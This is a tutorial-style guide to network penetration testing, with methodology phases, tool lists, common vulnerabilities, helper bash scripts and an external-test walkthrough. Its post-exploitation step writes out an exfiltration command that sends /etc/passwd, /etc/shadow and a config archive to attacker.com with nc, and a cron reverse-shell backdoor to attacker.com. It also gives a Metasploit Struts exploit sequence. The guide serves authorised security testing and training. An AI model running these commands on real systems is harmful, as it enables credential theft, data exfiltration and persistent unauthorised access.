Practical Network Penetration Testing

A comprehensive guide to methodologies, tools, and techniques for effective network security assessment

Introduction to Network Penetration Testing

Network penetration testing is the practice of simulating real-world attacks on computer networks to identify and address security vulnerabilities before malicious actors can exploit them. Unlike automated vulnerability scanning, penetration testing involves active exploitation attempts by skilled security professionals who think and act like attackers.

Why Perform Network Pentests?

  • Identify exploitable vulnerabilities in network infrastructure
  • Test the effectiveness of security controls and defenses
  • Meet compliance requirements (PCI DSS, HIPAA, etc.)
  • Validate security investments and prioritize remediation efforts
  • Improve incident response capabilities through realistic scenarios

Types of Network Pentests

  • Black Box: Tester has no prior knowledge of the target
  • White Box: Tester has complete knowledge of the target
  • Gray Box: Tester has partial knowledge of the target
  • External: Testing from outside the network perimeter
  • Internal: Testing from within the network

Penetration Testing Methodology
A structured approach to network penetration testing

Following a systematic methodology ensures thorough coverage and consistent results. While different frameworks exist (PTES, OSSTMM, NIST), most network penetration tests follow these core phases:

1. Reconnaissance

Gathering information about the target network without direct interaction.

Key Activities

  • OSINT (Open Source Intelligence) gathering
  • DNS enumeration and analysis
  • WHOIS and public record lookups
  • Social media research
  • Google dorking and search engine reconnaissance

Common Tools

theHarvester
Shodan
Maltego
Recon-ng
OWASP Amass

2. Scanning & Enumeration

Active probing of the target network to identify hosts, services, and potential vulnerabilities.

Key Activities

  • Network mapping and host discovery
  • Port scanning and service identification
  • OS fingerprinting
  • Service enumeration
  • Vulnerability scanning

Common Tools

Nmap
Masscan
Nessus/OpenVAS
Nikto
enum4linux

3. Vulnerability Analysis

Analyzing discovered services and systems for security weaknesses.

Key Activities

  • Identifying known vulnerabilities in services
  • Configuration analysis
  • Password policy assessment
  • Firewall/IDS/IPS evasion testing
  • Manual verification of scanner findings

Common Tools

Nessus
OpenVAS
Nexpose
Qualys
Burp Suite

4. Exploitation

Actively exploiting identified vulnerabilities to gain access to systems.

Key Activities

  • Exploiting network service vulnerabilities
  • Password attacks (brute force, credential stuffing)
  • Man-in-the-middle attacks
  • Privilege escalation
  • Social engineering (if in scope)

Common Tools

Metasploit
Hydra
Hashcat
Responder
Cobalt Strike

5. Post-Exploitation

Actions taken after gaining access to demonstrate impact and risk.

Key Activities

  • Privilege escalation
  • Lateral movement through the network
  • Data exfiltration testing
  • Persistence mechanism testing
  • Evidence collection for reporting

Common Tools

Mimikatz
Empire
BloodHound
PowerSploit
CrackMapExec

6. Reporting

Documenting findings, impacts, and remediation recommendations.

Key Activities

  • Executive summary creation
  • Technical findings documentation
  • Risk assessment and prioritization
  • Remediation recommendations
  • Evidence preservation

Common Tools

Dradis
Faraday
PlexTrac
Markdown/LaTeX
Custom templates

Essential Network Pentesting Tools
The most important tools in a network penetration tester's arsenal
Shodan

The search engine for Internet-connected devices. Helps identify exposed services and potential entry points.

# Example Shodan queries
org:"Target Company"
hostname:"example.com"
port:3389 country:"US"
http.title:"Admin Login"
OWASP Amass

In-depth DNS enumeration and network mapping tool that uses multiple techniques to discover subdomains.

# Basic subdomain enumeration
amass enum -d example.com

# Passive reconnaissance only
amass enum -passive -d example.com
theHarvester

Gathers emails, subdomains, hosts, employee names, open ports and banners from different public sources.

# Gather information from multiple sources
theharvester -d example.com -b google,linkedin,twitter,shodan

# Limit results and save to file
theharvester -d example.com -l 500 -b all -f results.html
Common Network Vulnerabilities
Frequently discovered issues during network penetration tests
Weak Authentication
High
Systems with default, weak, or reused credentials.

Common Examples

  • Default router credentials (admin/admin)
  • Password reuse across multiple systems
  • Lack of multi-factor authentication
  • Weak password policies

Testing Approach

Password spraying (one password tried against many accounts, paced to stay under the lockout threshold), credential stuffing with breached credential sets, and targeted brute force only where no lockout policy applies

Unpatched Systems
Critical
Systems missing critical security updates.

Common Examples

  • EternalBlue (MS17-010) vulnerability
  • Outdated web servers (Apache, Nginx)
  • Legacy operating systems (Windows 7, Server 2008)
  • Unpatched VPN appliances

Testing Approach

Vulnerability scanning, version fingerprinting

Insecure Network Services
High
Unnecessarily exposed or misconfigured services.

Common Examples

  • Open SMB shares with sensitive data
  • Telnet instead of SSH
  • Unencrypted FTP servers
  • SNMP with default community strings

Testing Approach

Port scanning, service enumeration, banner grabbing

Misconfigured Firewalls
High
Firewall rules that are too permissive or improperly configured.

Common Examples

  • Overly permissive ingress/egress filtering
  • Unnecessary open ports
  • Inconsistent rule enforcement
  • Outdated firewall software

Testing Approach

Firewall rule testing, egress filtering tests

Insecure Protocols
Medium
Use of deprecated or unencrypted communication protocols.

Common Examples

  • HTTP instead of HTTPS
  • SMBv1 instead of SMBv3
  • Unencrypted email protocols (POP3, IMAP)
  • Telnet instead of SSH

Testing Approach

Protocol analysis, traffic capture, MitM attacks

Weak Network Segmentation
High
Insufficient separation between network zones of different trust levels.

Common Examples

  • Flat networks without VLANs
  • Direct access from user networks to critical systems
  • Inadequate DMZ implementation
  • Missing internal firewalls

Testing Approach

Network mapping, lateral movement testing
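Both the egress-filtering test in the Misconfigured Firewalls section and the segmentation test here come down to the same question: from a host in zone A, which ports on zone B answer? The probe below is an added example and not code from the original page. It needs only bash on the foothold (the /dev/tcp pseudo-device), classifies each target as open, closed (refused, so the host is reachable) or filtered (silently dropped, which is what a correctly configured firewall looks like), and flags any target the rules of engagement said should be blocked but which accepts a connection. The target list and the 203.0.113.0/24 addresses are constructed placeholders.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): TCP reachability matrix for
# egress-filtering and segmentation tests. Run it from the zone under test
# (a user VLAN, a DMZ host, a compromised workstation) against the list of
# "host port expected" lines below. Targets are hypothetical documentation
# addresses; replace them with the crown-jewel hosts or external probe hosts
# agreed in scope.

# probe <host> <port> [timeout seconds]: prints open | closed | filtered
probe() {
  local host=$1 port=$2 t=${3:-3}
  timeout "$t" bash -c "exec 3<>/dev/tcp/$host/$port" 2>/dev/null
  case $? in
    0)   echo open ;;       # TCP handshake completed: a listening service
    124) echo filtered ;;   # timed out: packets dropped, firewall in the path
    *)   echo closed ;;     # refused or unreachable: host answers, nothing listening
  esac
}

# matrix <file>: each line is "<host> <port> <blocked|open>", the last field
# being what the network design says should happen. Prints one result per
# line and tags the two cases a tester cares about.
matrix() {
  local host port expect got tag
  while read -r host port expect; do
    case $host in ''|\#*) continue ;; esac
    got=$(probe "$host" "$port" "${PROBE_TIMEOUT:-3}")
    if [ "$expect" = blocked ] && [ "$got" = open ]; then
      tag=' FINDING: reachable but should be blocked'
    elif [ "$expect" = open ] && [ "$got" != open ]; then
      tag=' NOTE: expected path unavailable, check vantage point'
    else
      tag=''
    fi
    printf '%s %s %s%s\n' "$host" "$port" "$got" "$tag"
  done < "$1"
}

# Constructed target list. For a segmentation test these are critical servers
# probed from a user VLAN; for an egress test they are external hosts probed
# from inside on ports that should never leave the network.
SAMPLE_TARGETS="$(mktemp)"
cat > "$SAMPLE_TARGETS" <<'EOF'
# host          port  expected
203.0.113.10    445   blocked
203.0.113.10    3389  blocked
203.0.113.20    1433  blocked
EOF

PROBE_TIMEOUT=1 matrix "$SAMPLE_TARGETS"
```

Three seconds per filtered port adds up; run the list in parallel with xargs or GNU parallel for more than a few dozen targets, and keep the output file, since the matrix is the evidence for the segmentation finding in the report.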

Practical Walkthrough Examples
Step-by-step examples of common network penetration testing scenarios

External Network Penetration Test Walkthrough

This example demonstrates a typical approach to testing an organization's external network perimeter.

Step 1: Reconnaissance

# Identify IP ranges owned by the target: start from an address you already know
# is theirs and ask the registry which netblock and organisation hold it, then
# list every prefix the organisation's AS announces (AS64496 is a placeholder)
whois 203.0.113.10
whois -h whois.radb.net -- '-i origin AS64496'

# Discover subdomains
amass enum -d example.com -o subdomains.txt

# Resolve subdomains to IPv4 addresses, one per line, deduplicated
while read -r sub; do
  host "$sub" | awk '/has address/ { print $4 }'
done < subdomains.txt | sort -u > ips.txt

During this phase, we identify the target's network footprint, including IP ranges, domain names, and subdomains. This helps map out the attack surface before active scanning begins.

Step 2: Service Discovery

# Initial port scan of a handful of common ports across every address
nmap -sS -T4 -p 21,22,23,25,53,80,443,8080,8443 -iL ips.txt -oA quick_scan

# Hosts that answered become the target list for the comprehensive scan
awk '/Status: Up/ { print $2 }' quick_scan.gnmap | sort -u > live_hosts.txt

# Comprehensive scan on discovered hosts (all TCP ports, default NSE scripts)
nmap -sS -sV -sC -p- -iL live_hosts.txt -oA full_scan

# Aggressive version detection on one host's open ports; open_ports.txt holds
# one port per line and paste joins them without the trailing comma tr leaves
nmap -sV --version-intensity 9 -p "$(paste -sd, open_ports.txt)" 203.0.113.10

Here we identify open ports and running services on the target's external-facing systems. The initial scan focuses on common ports, followed by a more comprehensive scan of live hosts.
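The walkthrough consumes live_hosts.txt and open_ports.txt without showing where they come from; in practice they are parsed out of nmap's grepable output (the .gnmap file that -oA writes). The following is an added example, not code from the original page: it extracts the live hosts and each host's open TCP ports from a constructed .gnmap sample and prints the tailored version-detection command for every host. The 203.0.113.0/24 addresses are a documentation range, not a real target.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): build live_hosts.txt and per-host
# port lists from nmap grepable output. The scan data below is a constructed
# sample in .gnmap format; 203.0.113.0/24 is a documentation range.

SAMPLE_GNMAP="$(mktemp)"
cat > "$SAMPLE_GNMAP" <<'EOF'
# Nmap 7.94 scan initiated (constructed sample, not real scan output)
Host: 203.0.113.10 ()   Status: Up
Host: 203.0.113.10 ()   Ports: 22/open/tcp//ssh///, 80/open/tcp//http///, 443/open/tcp//https///   Ignored State: filtered (6)
Host: 203.0.113.11 ()   Status: Up
Host: 203.0.113.11 ()   Ports: 21/open/tcp//ftp///, 23/closed/tcp//telnet///, 8080/open/tcp//http-proxy///   Ignored State: filtered (6)
Host: 203.0.113.12 ()   Status: Down
# Nmap done: 3 IP addresses (2 hosts up)
EOF

# live_hosts <gnmap>: every address nmap reported as "Status: Up", once each.
live_hosts() {
  awk '/Status: Up/ { print $2 }' "$1" | sort -u
}

# open_ports <gnmap> <host>: the host's open TCP ports as "22,80,443".
# Closed and filtered entries are dropped so later scans only touch real services.
open_ports() {
  grep "^Host: $2 " "$1" \
    | grep -o '[0-9][0-9]*/open/tcp' \
    | cut -d/ -f1 | sort -n | paste -sd, -
}

# followup_scan_cmd <gnmap> <host>: print (do not run) the version-detection
# scan for one host; fails if the host has nothing open.
followup_scan_cmd() {
  local ports
  ports="$(open_ports "$1" "$2")"
  [ -n "$ports" ] || return 1
  printf 'nmap -sV --version-intensity 9 -p %s -oA full_%s %s\n' "$ports" "$2" "$2"
}

# Dry run over the sample: one tailored command per live host.
for h in $(live_hosts "$SAMPLE_GNMAP"); do
  followup_scan_cmd "$SAMPLE_GNMAP" "$h"
done
```

Against real output, replace SAMPLE_GNMAP with quick_scan.gnmap and redirect live_hosts into live_hosts.txt; parsing the .gnmap rather than the human-readable .nmap file is deliberate, because the grepable format is stable across versions and keeps each host on one line.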

Step 3: Vulnerability Identification

# Scan web applications
nikto -h https://example.com -o nikto_results.txt

# Check for SSL/TLS issues
sslscan example.com:443

# Vulnerability scan: Nessus and OpenVAS scans are launched from their web UI or
# REST API; nmap's NSE vuln scripts give a quick first pass from the command line
nmap -sV --script vuln -iL live_hosts.txt -oA vuln_scan

After identifying services, we look for known vulnerabilities in those services. This includes web application scanning, SSL/TLS testing, and comprehensive vulnerability scanning.

Step 4: Exploitation

# Search public exploits for the exact version fingerprinted in step 2
searchsploit apache 2.4.39

# In Metasploit: pick the module that matches the software actually found (here a
# Struts 2 application on port 8080, which is separate from the Apache httpd
# version above), run its check first, then exploit
use exploit/multi/http/struts2_content_type_ognl
set RHOSTS 203.0.113.10
set RPORT 8080
set TARGETURI /vulnerable-app/
check
exploit

Based on discovered vulnerabilities, we attempt to exploit them to gain access to the target systems. This might involve using public exploits, custom scripts, or tools like Metasploit.

Step 5: Post-Exploitation

# Privilege escalation enumeration (linPEAS is a shell script, not a Python script)
./linpeas.sh | tee /tmp/linpeas.txt

# Data exfiltration test: only the files named in the rules of engagement; a
# small sample proves the point as well as a full dump does
tar czf /tmp/sensitive_data.tar.gz /etc/passwd /etc/shadow /var/www/config.php
nc attacker.com 4444 < /tmp/sensitive_data.tar.gz

# Establish persistence: a reverse-shell cron job. Append to the existing crontab
# rather than replace it (a bare "crontab file" overwrites whatever was there),
# and keep the exact line so it can be removed during cleanup
echo "* * * * * /bin/bash -c 'bash -i >& /dev/tcp/attacker.com/4445 0>&1'" > /tmp/cron_backdoor
(crontab -l 2>/dev/null; cat /tmp/cron_backdoor) | crontab -

After gaining access, we demonstrate the potential impact by attempting privilege escalation, accessing sensitive data, and establishing persistence. This illustrates the real-world risk of the vulnerabilities found. Every artefact planted in this phase (cron entries, staged archives, dropped tools, created accounts) is logged with host, path and timestamp and removed before the engagement closes.

Best Practices for Network Penetration Testing
Guidelines to ensure effective, safe, and professional penetration testing
Before the Test
  • Obtain proper written authorization
  • Define clear scope and boundaries
  • Establish emergency contacts
  • Create a detailed test plan
  • Perform risk assessment for testing activities
  • Set up isolated testing environment when possible
During the Test
  • Maintain detailed documentation of all activities
  • Regularly communicate status with stakeholders
  • Avoid denial-of-service conditions
  • Test during approved time windows
  • Respect out-of-scope systems and data
  • Secure sensitive data collected during testing
After the Test
  • Provide clear, actionable remediation steps
  • Prioritize findings based on risk
  • Securely delete sensitive client data
  • Offer retesting after remediation
  • Conduct a lessons learned session
  • Maintain confidentiality of results
Technical Considerations
  • Test exploits and payloads in a lab first, and prefer a module's check over its exploit where one exists, so nothing runs against production that you have not already seen behave
  • Implement rate limiting for intensive scans
  • Verify vulnerabilities manually to reduce false positives
  • Take incremental backups of your testing data
  • Use dedicated testing infrastructure
  • Maintain chain of custody for any evidence collected
Ethical Considerations

Network penetration testing involves accessing systems and data in ways that would normally be considered unauthorized. This creates ethical responsibilities beyond technical considerations:

  • Respect privacy - Minimize access to personal or sensitive data
  • Do no harm - Avoid actions that could damage systems or data
  • Maintain confidentiality - Treat all findings as strictly confidential
  • Report responsibly - Provide clear, actionable information without unnecessary alarmism
  • Stay within scope - Resist the temptation to explore beyond authorized boundaries
Additional Resources
Tools, training, and references to enhance your network penetration testing skills
Offensive Security Certified Professional (OSCP)

Hands-on penetration testing certification that teaches practical, real-world skills.

eLearnSecurity Penetration Testing Professional (ePTP)

Comprehensive course covering network penetration testing methodologies and techniques.

SANS SEC560: Network Penetration Testing and Ethical Hacking

In-depth training on network penetration testing from one of the most respected cybersecurity training organizations.

TCM Security - Practical Network Penetration Tester (PNPT)

Practical certification focused on real-world penetration testing skills.
